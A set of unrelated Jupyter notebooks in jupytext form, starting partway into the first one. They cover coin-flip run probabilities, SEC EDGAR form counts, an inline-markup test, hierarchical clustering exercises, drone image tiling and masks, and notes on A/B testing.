return '$'+str(float('%.4g' % ((_K-_N+2)/float(2**(_N+1))))*100.0)+'\%$'
def Exp_formatted(_N,_K):
"""Formatted result from Exponential expression for use below"""
return '$'+str(float('%.4g' % (1-np.exp(-(_K-_N+2)/float(2**(_N+1))) ))*100.0)+'\%$'
def Num_formatted(_Number):
"""Formatted float number as %"""
return '$'+str(float('%.4g' % _Number) *100.0)+'\%$'
data_matrix = [['A rally of N heads in K coin flips',
'$P=1-F_{K+2}^{(N)}/2^K$',
'$\simeq 1 - e^{-(K-N+2)/2^{N+1}}$',
'$\simeq (K-N+2)/2^{N+1}$'],
['$(5,11)$', Fibonacci_formatted(5,11), Exp_formatted(5,11), Taylor_formatted(5,11)],
['$(5,10)$', Fibonacci_formatted(5,10), Exp_formatted(5,10), Taylor_formatted(5,10)],
['$(15,40)$', Fibonacci_formatted(15,40), Exp_formatted(15,40), Taylor_formatted(15,40)],
['$(20,100)$',Fibonacci_formatted(20,100),Exp_formatted(20,100), Taylor_formatted(20,100)],
['$(7,150)$', Fibonacci_formatted(7,150), Exp_formatted(7,150), 'N/A'],
['$(20,10^6)$',Num_formatted(0.379253961),Exp_formatted(20,1e+6),'N/A'],
]
table = ff.create_table(data_matrix,colorscale = [[0, '#4d004c'],[.5, '#f2e5ff'],[1, '#ffffff']])
py.iplot(table)
# -
# The bottom two rows in the last column are 'N/A' because the ratio $\frac{K-N+2}{2^{N+1}}$ is not much smaller $1$:
# * $(7,150)\rightarrow\frac{150-7+2}{2^{7+1}}\simeq 0.57$
# * $(20,10^6)\rightarrow\frac{10^6-20+2}{2^{20+1}}\simeq 0.48$
#
#
# The Fibonacci calculation is expensive and for the last row I took the result directly from [DrDobbs](http://www.drdobbs.com/architecture-and-design/20-heads-in-a-row-what-are-the-odds/229300217) instead of evaluating it. The goal in this notebook is to demostrate the efficacy of the approximate expressions.
# ### Derivation of the semi-analytical model
#
#
# _Consider:_
# * A sequence of $K$ letters contains $K-N+1$ words of length $N$.
# * All possible binary words of length $N$, e.g. $\underbrace{10101110}_{N=8}$, fit in a dictionary of $2^N$ words.
# * If one picks words randomly in search of a specific word, such as $\underbrace{11111\ldots}_{N-\text{times}}$, the probability of _not_ finding it is: $\left(1-\frac{1}{\text{size of dictionary}}\right)^{\text{# of words picked randomly}}$
#
# Identifying words in a sequence of letters is different than picking words out of a hat. Suppose we flip a coin looking for words/rallies of $111$ and finally find the first one after tossing $110100\underline{111}$. There is a $\frac{1}{2}$ probability that if we toss again we will get a second rally back to back $1101001\underline{111}$, a $\frac{1}{4}$ probability for a third rally and so on. So the average number of rallies we can expect to have is [$2$](https://en.wikipedia.org/wiki/Zeno%27s_paradoxes); if we find one there will be one more (on average) back to back. Since the words/rallies in question appear in pairs they must be $\frac{1}{2}$ as common in the rest of the population so:
#
#
# Probability of _no_ rallies $\simeq \left(1-\frac{1}{\text{size of dictionary}}\right)^{\frac{\text{# of words in sequence}}{2}}=\left(1-\frac{1}{2^N}\right)^{\frac{K-N}{2}+1}$
#
# $\Rightarrow$ $\boxed{P \simeq 1-\left(1-\frac{1}{2^N}\right)^{\frac{K-N+2}{2}}}$
def SemiAnalytical_expression(_N,_Klist):
"""Semi-analytical calculation returns a list that enables plotting P(K)"""
trials = float(2**(_N))
return [1-(1-1.0/trials)**((_K-_N+2)/2.0) for _K in _Klist ]
# When $1\ll 2^N$ we can use $e=\lim_{n\rightarrow\infty}\left(1+\frac{1}{n}\right)^n$ to rewrite:
#
# $ \boxed{P \simeq 1 - \exp\left(-\frac{K-N+2}{2^{N+1}}\right),\quad \text{for}\quad 1\ll2^{N}}$
def Exponential_expression(_N,_Klist):
"""Exponential approximation returns a list that enables plotting P(K)"""
trials = float(2**(_N+1))
return [1-np.exp(-(_K-_N+2)/trials) for _K in _Klist ]
# Finally, in the limit $(K-N+2)\ll2^{N+1}$ we can use the Taylor expansion $e^x\simeq 1+x$ to simplify $P$:
#
# $ \boxed{P \simeq\frac{K-N+2}{2^{N+1}},\quad \text{for}\quad \frac{K-N+2}{2^{N+1}}\ll 1}$
def Taylor_expansion(_N,_Klist):
"""The Taylor expansion of the exponential returns a list that enables plotting P(K)"""
trials = float(2**(_N+1))
return [(_K-_N+2)/trials for _K in _Klist ]
# ### Stochastic matrix calculation
#
# To verify the semi-analytical expressions above I compare them with numerically calculated results obtained using the [Stochastic Matrix](https://en.wikipedia.org/wiki/Stochastic_matrix) method. This is an efficient approach that is often used to solve this problem, e.g. [Quora](https://www.quora.com/What-is-the-probability-of-getting-5-consecutive-heads-in-11-tosses-of-a-fair-coin).
#
# The function takes (N,K) as parameters and returns:
#
# * K_list = [2,3,4,5,...,K]
#
# * P_list = List of probabilities for "i" coin tosses with "i" in K_list.
def Stochastic_Matrix_PvsN(_N,_K):
"""Stochastic matrix method"""
# Initial state
d0 = np.zeros(_N+1)
d0[0] = 1.0
# Initialize stochastic matrix
M = np.zeros((_N+1,_N+1))
for i in range(0,_N):
M[0,i] = 0.5
M[i+1,i] = 0.5
M[_N,_N] = 1.0
# Calculate probability for an N-length run
Mn = np.copy(M)
Plist = []
Klist = range(2,_K+1)
for i in Klist:
Mn = np.matmul(Mn,M)
Plist.append( np.matmul(Mn,d0.T)[_N])
return Plist, Klist
# ### Comparison between semi-analytical model and numerical calculations
#
# The parameters in the calculation are $N=5,10,20,30$ and $K=N+1,\ldots 10^6$.
# +
Run_length = [5,10,20,30]
TotalTrials = 1000000
xaxis = [None] * len(Run_length)
Numerical = [None] * len(Run_length)
SemiAnalytical = [None] * len(Run_length)
Exponential = [None] * len(Run_length)
TaylorExpansion = [None] * len(Run_length)
for i,run in enumerate(Run_length):
Numerical[i], xaxis[i] = Stochastic_Matrix_PvsN(run, TotalTrials)
SemiAnalytical[i] = SemiAnalytical_expression(run, xaxis[i])
Exponential[i] = Exponential_expression(run, xaxis[i])
TaylorExpansion[i] = Taylor_expansion(run, xaxis[i])
# -
# Now let's plot the results:
import matplotlib.pyplot as plt
import matplotlib.lines as mlines
# %matplotlib inline
# +
plt.figure(figsize=(15,10))
colors = ['Red','Green','Blue','Black']
FSZ = 20
ymin = 1e-9
for i,run in enumerate(Run_length):
plt.loglog(xaxis[i][(run+1):],Numerical[i][(run+1):],color=colors[i],lw =4, alpha = 0.4)#,label = 'x='+str(run))
plt.loglog(xaxis[i][(run+1):],Exponential[i][(run+1):],color=colors[i],lw = 2,ls = '-')#,label="Analytical")
plt.loglog(xaxis[i][(run+1):],TaylorExpansion[i][(run+1):],color=colors[i],lw = 2,ls = '--')#,label="Analytical")
plt.ylim([ymin,1])
plt.xlabel("# of coin flips",fontsize = FSZ)
plt.title("Probability of at least one rally of N heads",fontsize = FSZ)
plt.xticks([10**i for i in range(1,int(np.ceil(np.log10(TotalTrials)))+1 )], fontsize = FSZ)
plt.yticks([10**i for i in range(0,int(np.log10(ymin)) ,-2) ], fontsize = FSZ)
plt.text(15, 0.15, 'N=5',rotation=23, color=colors[0], fontsize=FSZ)
plt.text(50, 0.022, 'N=10',rotation=23, color=colors[1], fontsize=FSZ)
plt.text(400, 0.02*1e-2, 'N=20',rotation=23, color=colors[2], fontsize=FSZ)
plt.text(2000, 0.085*1e-5, 'N=30',rotation=23, color=colors[3], fontsize=FSZ)
fatline = mlines.Line2D([], [], color='Black',lw =4, alpha = 0.4, label = 'Stochastic matrix calculation' )
solidline = mlines.Line2D([], [], color='Black',lw =2, ls = '-', label = '$1-\exp[-(K-N+2)/2^{N+1}]$')
brokenline = mlines.Line2D([], [], color='Black',lw =2, ls = '--', label = '$(K-N+2)/2^{N+1}$')
plt.legend(handles=[fatline,solidline,brokenline],loc='lower right',fontsize = FSZ )
plt.show()
# -
# The Taylor expansion is in good agreement with the numerical solution as long as $P\lesssim 0.1$. So the first step is to calculate $(K-N+2)/2^{N+1}$ and only if the result is larger than $0.1$ I will switch to the exponential expression. To confirm that the exponential expression performs well as $K$ increases, I calculate the relative error between the numerical solution and the exponential expression.
#
# $\text{Error} = \frac{\vert P_{\text{Exponential}}-P_{\text{Numerical}}\vert}{P_{\text{Numerical}}}$
# +
Relative_error_Exponential= []
for a,t,n in zip(Exponential,TaylorExpansion,Numerical):
Relative_error_Exponential.append([ np.abs(a[i]/(n[i]+1e-15) - 1) for i in range(0,len(n))])
plt.figure(figsize=(15,10))
for i,run in enumerate(Run_length):
plt.loglog(xaxis[i][(run+1):],Relative_error_Exponential[i][(run+1):],color= colors[i], lw = 3, label = 'N = '+str(run))
ymin_err = 1e-9
plt.ylim([ymin_err,1])
plt.xlabel('# of coin flips',fontsize = FSZ)
plt.title('Error = |Exponential/Numerical - 1|',fontsize = FSZ)
plt.legend(loc='upper right',fontsize = FSZ )
plt.xticks([10**i for i in range(1,int(np.ceil(np.log10(TotalTrials)))+1 )], fontsize = FSZ)
plt.yticks([10**i for i in range(0,int(np.log10(ymin_err)),-2) ], fontsize = FSZ)
plt.show()
# -
# ### Appendix: Exact answer using the Fibonacci N-step sequence
#
# __Looking backward:__
#
# Let $S_K$ be the number of sequences of $K$ tosses that don't have $N$ consecutive heads, $S_{K,H}$ the portion of $S_K$ that ends in heads, and $S_{K,T}$ the portion of $S_K$ that ends in tails. By definition then:
#
# $S_K=S_{K,H}+S_{K,T}=
# \underbrace{S_{K−1,H}+S_{K-1,T}}_{S_{K,H}}+S_{K,T}=
# \underbrace{S_{K−2,H}+S_{K-2,T}}_{S_{K−1,H}}+S_{K-1,T}+S_{K,T}=\ldots\text{until}\ldots=\underbrace{S_{K−N+1,T}}_{S_{K−N+2,H}}+\sum_{i=0}^{N-2}S_{K-i,T}=
# \sum_{i=0}^{N-1}S_{K-i,T}$
#
#
# To end in tails, you just have to come from a sequence one shorter, so $S_{K,T}=S_{K−1}$. This yields:
#
# $S_K=\sum_{i=0}^{N-1}S_{K-1-i}\Rightarrow S_{K}=\sum_{i=1}^{N}S_{K-i}$
#
# This is the Fibonacci N-step sequence.
#
# __Looking forward:__
#
# * After $K=1$ tosses I have two possible sequences, $H$ and $T$, so $S_1 = F_{1+2}^{(N)} = 2$.
#
# * After $K<N$ tosses I have $2^K$ possible sequeces $S_{K<N} = F_{K+2}^{(N)} = 2^{K}$.
#
# * After $K=N$ tosses I have $2^K-1$ possible sequeces $S_{K=N} = F_{K+2}^{(N)} = 2^{K}-1$.
#
# * After $K>N$ I can use the expression $S_{K}=\sum_{i=1}^{N}S_{K-i}$.
#
# So, after $K$ coin tosses I have $S_K = F_{K+2}^{(N)}$ sequences with no rally of $N$ heads. Therefore, the probability of one rally of $N$ heads is:
#
# $P = 1- F_{K+2}^{(N)}/2^K$
|
Consecutive_heads.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
#pip install python-edgar
import edgar
import pandas as pd
import seaborn as sns
#show your place, where u want store data
#it downloads quaterly data since pointed year
edgar.download_index('C:/Users/user/Desktop/Bek', 2021, skip_all_present_except_last=False)
# -
# ***
# ### II.
# Проведите анализ частотности форм за первый квартал 2021 года:
# постройте таблицы как числа форм каждого конкретного типа,
# так и числа компаний по которым подана хоть одна форма каждого типа.
# По топ-10 наиболее популярным формам,
# постройте графики этих величин в зависимости от дня квартала.
# ***
# Answer: In this part I decided to use edgar module, which download us quaterly data. Quaterly data stored in this link below https://www.sec.gov/Archives/edgar/full-index/
# here reading stored data
data = pd.read_csv('C:/Users/user/Desktop/Bek/2021-QTR1.tsv', sep='|', lineterminator='\n', names=None)
#renaming columns
data.columns.values[0]='CIK'
data.columns.values[1]='Company Name'
data.columns.values[2]='FormType'
data.columns.values[3]='Date'
data.columns.values[4]='Txt'
data.columns.values[5]='Link'
#csv["Date"] = pd.to_datetime(csv["Date"])
data = data.sort_values(by="Date")
data.head(10)
#pd.set_option("display.max_rows", None, "display.max_columns", None)
# quantity of companies which filled each type of form
data.groupby(['Company Name','FormType']).size().reset_index(name='Count')
#showing a table number of each form type,
form_count = data.groupby("FormType")["FormType"].count().reset_index(name='Count')
form_count
#top 10 filled most frequency forms in first quater
f_10 =form_count.nlargest(10,'Count')
f_10
sns.set_theme(style="whitegrid")
tips = sns.load_dataset("tips")
sns.set(rc={'figure.figsize':(11.7,8.27)})
sns.barplot(x="FormType", y="Count", data=f_10);
# top 10 filled forms related to date of quater
date_in_quater = data.groupby(['Date','FormType']).size().reset_index(name='Count')
date_q = date_in_quater.nlargest(10, 'Count')
#date_q.sort_values(by='Date')
date_q
#plot of the data above
sns.barplot(x="Date", y="Count", hue="FormType", data=date_q,dodge=False);
plt.xticks(rotation=45)
plt.tight_layout()
|
TaskNumberTwo.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python
# language: python3
# name: python3
# ---
# # Inline
#
# A test suite for inline items
# ## Code
#
# Here is some inline python `import numpy as np` that should be displayed
#
# and some text that is not code `here`
# ## Math
#
# Inline maths with inline role: $ x^3+\frac{1+\sqrt{2}}{\pi} $
#
# Inline maths using dollar signs (not supported yet): $x^3+frac{1+sqrt{2}}{pi}$ as the
# backslashes are removed.
|
tests/ipynb/inline.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# +
import pandas as pd
import numpy as np
import copy
from collections import defaultdict
# -
# ## Ex.1 (4pts) Reading in distance matrices
#
# Write a function that is able to read distance matrices and store them, for instance, in a dictionary of dictionaries so that distances can b e accessed like dist['D']['B'].
#
# +
#### Dict method ####
# -
def read_distance_dict(filename):
with open(r'C:\Users\<NAME> R S\Downloads\SoSe 2020\\'+filename,'r') as f:
dist={}
content=f.readlines()
dkey=' '.join(content[0])
dk=dkey.split()
for line in content[1:]:
entries=line.split()
label=entries[0]
distance=entries[1:]
dist[label]={}
for k,v in zip(dk,distance):
if label!=k:
dist[label][k]=float(v)
return dist
matrix=(read_distance_dict('small-distances.txt'))
matrix['A']['B']
# +
#### Dataframe method ####
# +
def read_distance_df(filename):
distance = open(r'C:\Users\<NAME> R S\Downloads\SoSe 2020\\'+filename,'r').read().splitlines()
distance_seq = ''.join(distance[0].split())
distance = distance[1:] # cut header
distance = [line[2:] for line in distance]
distance = [line.split() for line in distance]
distance = [list(map(int, line)) for line in distance[:]]
distance = pd.DataFrame(distance)
for i in range(len(distance_seq)):
distance.rename(columns={ distance.columns[i]: distance_seq[i] }, inplace = True)
rows_dict = defaultdict()
for i in range(len(distance_seq)):
rows_dict[i] = distance_seq[i]
distance.rename(index=rows_dict, inplace = True)
return distance
small_distances = read_distance_df("small-distances.txt")
print("Small Distances\n",small_distances,"\n")
print("Dictionary Query [A][B] =",small_distances["A"]["B"])
# -
# ## Ex.2 (4pts) Number of elements of a nested tuple
#
# First, write a function that counts the number of elementary objects in a nested tuple. I.e., the function should return 3 for (('A','B'),'C') and 5 for ((('A','B'),'C'),('D','E')). This function will b e helpful when determining cluster distances.
#
def count_tuples(object):
"""function to count the number of elements in a tuple by flattening it
arg: input tuple
return : count"""
def flatten2list(object):
gather = []
for item in object:
if isinstance(item, (list, tuple, set)):
gather.extend(flatten2list(item))
else:
gather.append(item)
return gather
return len(flatten2list(object))
print(count_tuples((('A','B'),'C')))
print(count_tuples(((('A','B'),'C'),('D','E'))))
# # Ex.3 (4pts) Merging clusters
#
# Write a function taking three parameters: a distance matrix (i.e. a dictionary of dictionaries as in exercise 1) and two clusters (represented as strings / tuples) that merges two clusters by up dating the distance matrix.
#
# +
### dict form distance matrix ####
# +
def merge_cluster(dist,a,b):
m,n=count_tuples(a),count_tuples(b)
c=(a,b)
dist[c]={}
for k in dist.keys():
if k==a or k==b or k==c:
continue
nd=(dist[k][a]*n + dist[k][b]*m)/(m+n)
dist[c][k]=nd
dist[k][c]=nd
del dist[a]
del dist[b]
for k in dist.keys():
if k!=c:
del dist[k][a]
del dist[k][b]
return c
merge_cluster(matrix,'D','E')
# +
### Dataframe based distance matrix ###
# +
def cluster_merging(dist_matrix, clusterA, clusterB):
# Agglomerative Clustering
# Init
dist_matrix_reduced = copy.copy(dist_matrix) # Copying for not changing the object outside and easier debugging
cardinality_clusterA = count_tuples(clusterA)
cardinality_clusterB = count_tuples(clusterB)
# Calculate Score + Rename + Delete + Transpose + Rename + Delete + Transpose. Should work as long as its symmetric. I guess matrix transpose shouldn't be too expensive (maybe only indices are getting changed)
reduced_column = (cardinality_clusterA * dist_matrix_reduced[clusterA] + cardinality_clusterB * dist_matrix_reduced[clusterB]) / ( cardinality_clusterA + cardinality_clusterB )
dist_matrix_reduced[(clusterA, clusterB)] = reduced_column
del(dist_matrix_reduced[clusterA])
del(dist_matrix_reduced[clusterB])
dist_matrix_reduced = dist_matrix_reduced.T
reduced_column = (cardinality_clusterA * dist_matrix_reduced[clusterA] + cardinality_clusterB * dist_matrix_reduced[clusterB]) / ( cardinality_clusterA + cardinality_clusterB )
dist_matrix_reduced[(clusterA, clusterB)] = reduced_column
del(dist_matrix_reduced[clusterA])
del(dist_matrix_reduced[clusterB])
dist_matrix_reduced = dist_matrix_reduced.T
# Identity 0-ing
dist_matrix_reduced[(clusterA,clusterB)][(clusterA,clusterB)] = 0
return dist_matrix_reduced
# Call with Distance Matrix and Keys / Tuples to be removed
cluster_iter_1 = cluster_merging(small_distances, ('C'), ('B'))
print(cluster_iter_1)
# -
# # Ex.4 (4pts) Find closest clusters
# +
### dict based distance matrix ###
# +
def finding_small_distance_main(matrix):
def finding_small_distance(matrix):
list_key_val=[]
for i in matrix.values():
min_val=min(i.values()) # minimum value of each row -- value (in dict of dict)
min_key=''.join([k for k, v in i.items() if v == min(i.values())][0]) # key of that min value
key= ''.join([str(k) for k, v in matrix.items() if v ==i]) # main key of that value
#print(min_val,min_key,key)
min_val_min_key_key=((min_val,min_key,key))
list_key_val.append(min_val_min_key_key)
return tuple([k for k in sorted(list_key_val,key=lambda item: item[0],reverse=False)][0])
return tuple(finding_small_distance(matrix)[1:]),finding_small_distance(matrix)[0]
#cluster1,cluster2,value=
cluster,val=finding_small_distance_main(matrix)
cluster,val
# +
### data frame based distance matrix ###
# +
def find_smallest_distance(dist_matrix):
min_val = dist_matrix.replace(0, np.nan).stack().min()
min_idx = dist_matrix.replace(0, np.nan).stack().idxmin()
return min_idx, min_val
nearest_clusters = find_smallest_distance(small_distances)
print("The neirest clusters are", nearest_clusters[0],"with a distance of", nearest_clusters[1])
# -
# # Ex.5 (4pts) Hierarchical clustering
def hierarchical_clustering(_distance_matrix):
distance_matrix = copy.copy(_distance_matrix)
heights = dict.fromkeys(distance_matrix,0)
while len(distance_matrix) > 1:
cluster, value = find_smallest_distance(distance_matrix)
distance_matrix = cluster_merging(distance_matrix, cluster[0], cluster[1])
heights.update({cluster : value/2})
return distance_matrix, heights
tree_smalldistances, cluster_heights_smalldistances = hierarchical_clustering(small_distances)
print("Tree Clusters by agglomoration - small-distances.txt:\n", *tree_smalldistances)
from showtree import showtree
print(showtree(*tree_smalldistances, cluster_heights_smalldistances))
|
solutions/Ruppa Surulinathan-plab-05.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: a3dbr
# language: python
# name: a3dbr
# ---
# # Clean code to crop and concatenate drone images
#
# Tools to crop big drone images into smaller images that can be used with Deeplabv3+ model to make prediction, and also codes that take the prediction for the croped images and concatenate them to get back to the original size. There is also a function that superimpose the predicted mask on top of the drone images.
#
#
# +
from image_slicer import save_tiles, slice
from pathlib import Path
from PIL import Image
import numpy as np
from math import sqrt, ceil, floor
import os
import glob
def get_concat_h(im2, im1):
dst = Image.new('RGB', (im2.width + im1.width, im2.height))
dst.paste(im2, (0, 0))
dst.paste(im1, (im2.width, 0))
return dst
def get_concat_v(im2, im1):
dst = Image.new('RGB', (im2.width, im2.height + im1.height))
dst.paste(im2, (0, 0))
dst.paste(im1, (0, im2.height))
return dst
def concat_masks(mask_path, croped_masks_path,images_path,num_cols,num_rows,new_height,new_width,mask_type="png",image_type="jpg"):
os.makedirs(mask_path, exist_ok=True)
croped_filenames = glob.glob(os.path.join(croped_masks_path,"*"+mask_type))
files_names = glob.glob(os.path.join(images_path,"*"+image_type))
images_names = [Path(x).stem for x in files_names]
for name in images_names:
#print(name)
croped_mask_path = os.path.join(croped_masks_path, Path(name).stem + "_{row:02d}_{col:02d}." + mask_type)
row_images = []
for i in range(num_rows):
path_i_1 = croped_mask_path.format(row = i+1, col = 1)
im_i_1 = Image.open(path_i_1)
for j in range(1,num_cols):
path_i_j = croped_mask_path.format(row = i+1, col = j+1)
im_i_j = Image.open(path_i_j)
im_i_1 = get_concat_h(im_i_1, im_i_j)
row_images.append(im_i_1)
im_1 = row_images[0]
for i in range(1,num_rows):
im_1 = get_concat_v(im_1,row_images[i])
concat_mask_path = os.path.join(mask_path, name + "." + mask_type)
#print(concat_mask_path)
im_1 = im_1.resize((new_height,new_width))
im_1.save(concat_mask_path)
def crop_images(images_path, croped_images_path,crop_num,image_type):
os.makedirs(croped_images_path, exist_ok=True)
files_names = glob.glob(os.path.join(images_path,"*"+image_type))
for file_name in files_names:
croped_images = slice(file_name, crop_num, save=False)
save_tiles(croped_images, prefix=Path(file_name).stem, directory=croped_images_path, format="JPEG")
def resize_images(croped_images_path,new_height,new_width,image_type):
files_names = glob.glob(os.path.join(croped_images_path,"*"+image_type))
for filename in files_names:
im = Image.open(filename)
im = im.resize((new_height,new_width))
im.save(filename)
def superimpose_images_masks(superimposed_path,images_path,masks_path):
os.makedirs(superimposed_path, exist_ok=True)
files_names = glob.glob(os.path.join(images_path,"*"+"JPG"))
images_names = [Path(x).stem for x in files_names]
for name in images_names:
mask_file_path = os.path.join(masks_path, name + "." + "png")
image_file_path = os.path.join(images_path, name + "." + "JPG")
superimposed_file_path = os.path.join(superimposed_path, name + "." + "jpg")
image = Image.open(image_file_path)
background = image.convert('RGBA')
mask = Image.open(mask_file_path)
foreground = mask.convert('RGBA')
superimp =Image.blend(background, foreground, alpha=.35)
superimp = superimp.convert('RGB')
superimp.save(superimposed_file_path)
# -
images_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/images/"
croped_images_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/images_croped_2/"
crop_images(images_path, croped_images_path,crop_num=12,image_type="JPG")
resize_images(croped_images_path,new_height=512,new_width=512,image_type="jpg")
images_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/images/"
croped_masks_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/masks_croped_2/"
masks_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/masks_2/"
#concat_masks(masks_path, croped_masks_path,images_path,num_cols=4,num_rows=3,new_height=4000,new_width=3000,mask_type="png",image_type="JPG")
superimposed_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/superimposed_2/"
superimpose_images_masks(superimposed_path,images_path,masks_path)
import numpy as np
filename = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/superimposed_2/DJI_0113.JPG"
im_org = Image.open(filename)
data = np.asarray(im_org)
data.shape
# # Diecece 32
images_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/images/"
croped_masks_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/masks_croped_dicece32/"
masks_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/masks_dicece32/"
concat_masks(masks_path, croped_masks_path,images_path,num_cols=4,num_rows=3,new_height=4000,new_width=3000,mask_type="png",image_type="JPG")
superimposed_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/superimposed_dicece32/"
superimpose_images_masks(superimposed_path,images_path,masks_path)
# # Dicece32 probs
images_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/images/"
croped_masks_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/masks_croped_probs_dicece32/"
masks_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/masks_probs_dicece32/"
concat_masks(masks_path, croped_masks_path,images_path,num_cols=4,num_rows=3,new_height=4000,new_width=3000,mask_type="png",image_type="JPG")
superimposed_path = "/Users/stouzani/Desktop/Unstructured_ML/Drone/Drone_Data_Capture/pix4d_HQ/dji_demo/superimposed_dicece32_probs/"
superimpose_images_masks(superimposed_path,images_path,masks_path)
|
Example_Notebooks/clean_drone_images_croped_ST.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# A/B Testing is the test that we want to test for particular product. Usually A/B testing works for testing changes in elements in the web page. A/B testing framework is following sequence:
#
# * Design a research question.
# * Choose test statistics method or metrics to evaluate experiment.
# * Designing the control group and experiment group.
# * Analyzing results, and draw valid conclusions.
#
# A/B testing is used to validate whether the changes that we have applied in our product is significantly affected our users instead of relying solely on the expert opinion.
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/m-40043986740) 0:03*
#
# <!--TEASER_END-->
# ## When to use A/B testing
# 
# A/B Testing can be used to make a convergence to global minimum, but not useful for comparing two global minimum. It also not particulary useful to make overall testing.
#
# Consider example above:
#
# 1. This example can't be used for A/B testing. It tries to answer vague question, and it's too general. We don't which specific metric/method to use to answer this. Hence the only way we can do is to test for specific product.
# 2. It's not design to test premium service of your site. Suppose that you have a bunch of premium features and decide to do some A/B testing and divide control and experiment group. This group would not going to be roughly equal since there will be users that opt for premium, or not. And it will not affect overall users. So we could only gather knowledge, but not for full blown test.
# 3. The third one is where A/B testing can be shine. It will affect all users, so can divide them to both groups, and we have clear metrics to test the algorithm, for example by ranking.
# 4. The fourth one is also where A/B testing can be useful. We have all set of product that we want to test, has some metrics that we can test, as long we have both computing power.
# Let's take another examples
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/e-4004398678/m-4004398680) 0:51*
# In the first part, we know that things like cars can be sold for a very long time. A/B testing only collect data that occurs in small window (at least for us to analyze). People comes to the website maybe 6 months to 1 year in the future to buy. And it maybe not by the website, but by other referrals. We couldn't wait that long for testing purposes, and the data won't be enough. The second part, also relates to the first reason. Updating company's logo, will take time until customer reacts. So it won't be good for A/B testing. The final part, we have clear control and experiment groups, and also clear metrics. So A/B testing does useful for this situation.
# A/B testing is used as a general method online to test features, decide audience control and experiment set, and which is better. A/B testing is used to find the global maximum significant of one changes, between control group and experiment group. It doesn't too useful however to compare two changes that already at its best. Amazon personal recommendation can be increased with A/B testing, one hundres of millisecond delay at page view can be tested by A/B testing, as it always decrease 1% revenue.
#
# A/B testing is really tricky to measure, as we need good metric to analyse. A/B testing can tell different about one changes, but not for overall changes. That's why when we usually have one big experiment, we have multiple A/B testing across multiple experiments.
# ### Other techniques
#
# Well then if we can't use A/B testing, what other techniques can be used to test changes in our product? A/B testing can be used to observe users log, make it as observational studies when the hypothesis changes, use behaviour randomized restrospective analysis. Restropective analysis give you small, but deep qualitative data, but A/B testing give you form of quantitative data.
#
# The difference for quantitative vs qualitative is also applied when you do online vs traditional experiment. In traditional experiment, you know each of the people in your group. Not only their health status if you test new medicine for example, but also their habbit, their occupation, their family, their hobby. You know them deeply by interacting with them. But in an online experiment, all of this are gone. You only new time and possibily some ip and user agent, but that's it. You can get millions of users in an online testing, but not so deeply as small qualitative group.
# ## History of A/B testing
#
# There was no official record stated about the origin of A/B testing. But it was long applied in the aggriculture field, where farmers divide section and apply various techniques and observe which is better for distinct crop.
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/m-4004398683) 1:56*
# We can take a web company, called Udacity for example, that want to apply changes like in the experiment in the image above stated. Usually in every digital web company, they have some funnel analysis. That is the number of users, from homepage visits, to gain actual conversion, that is final act that we actually care about. Either it's creating an account, or maybe complete a purchase. This funnel describe how number of users can be decreased down as we move to deeper layer. The idea is, if we apply this change in homepage visits, it should be increase more users to one deeper layer, 'Exploring the site'. If it's not giving significance increase, we don't want to launch it. And we absolutely don't want to launch it if the change even decrease the number of users to the next layer. Ideally if we can increase number of users to one deeper layer, then it would also have an increase to even deeper layer, that got actual conversion.
# 
#
# *Screenshot taken from [Udacity](https://www.udacity.com/course/viewer#!/c-ud257/l-4018018619/m-4004398684) 2:19*
# After we have design a research question, like in the previous paragraph, we want to have test statistics that fit in our experiment. One popular alternative is CTR, click-through-rate that measures number of clicks for each particular users. But for our particular case, CTR not the best case scenario. What we actually want is CTP, click-through-probability. CTR won't give you number of unique users, it instead give number of clicks. If for example we have two person, as described above, with first person, never click, and second person have 5 clicks(probably because lagging and he's rapid clicking the button).
#
# CTR will give you
#
# clicks/person = 5/2 = 2.5
#
# CTP will give you
#
# atleastone/person = 0.5
#
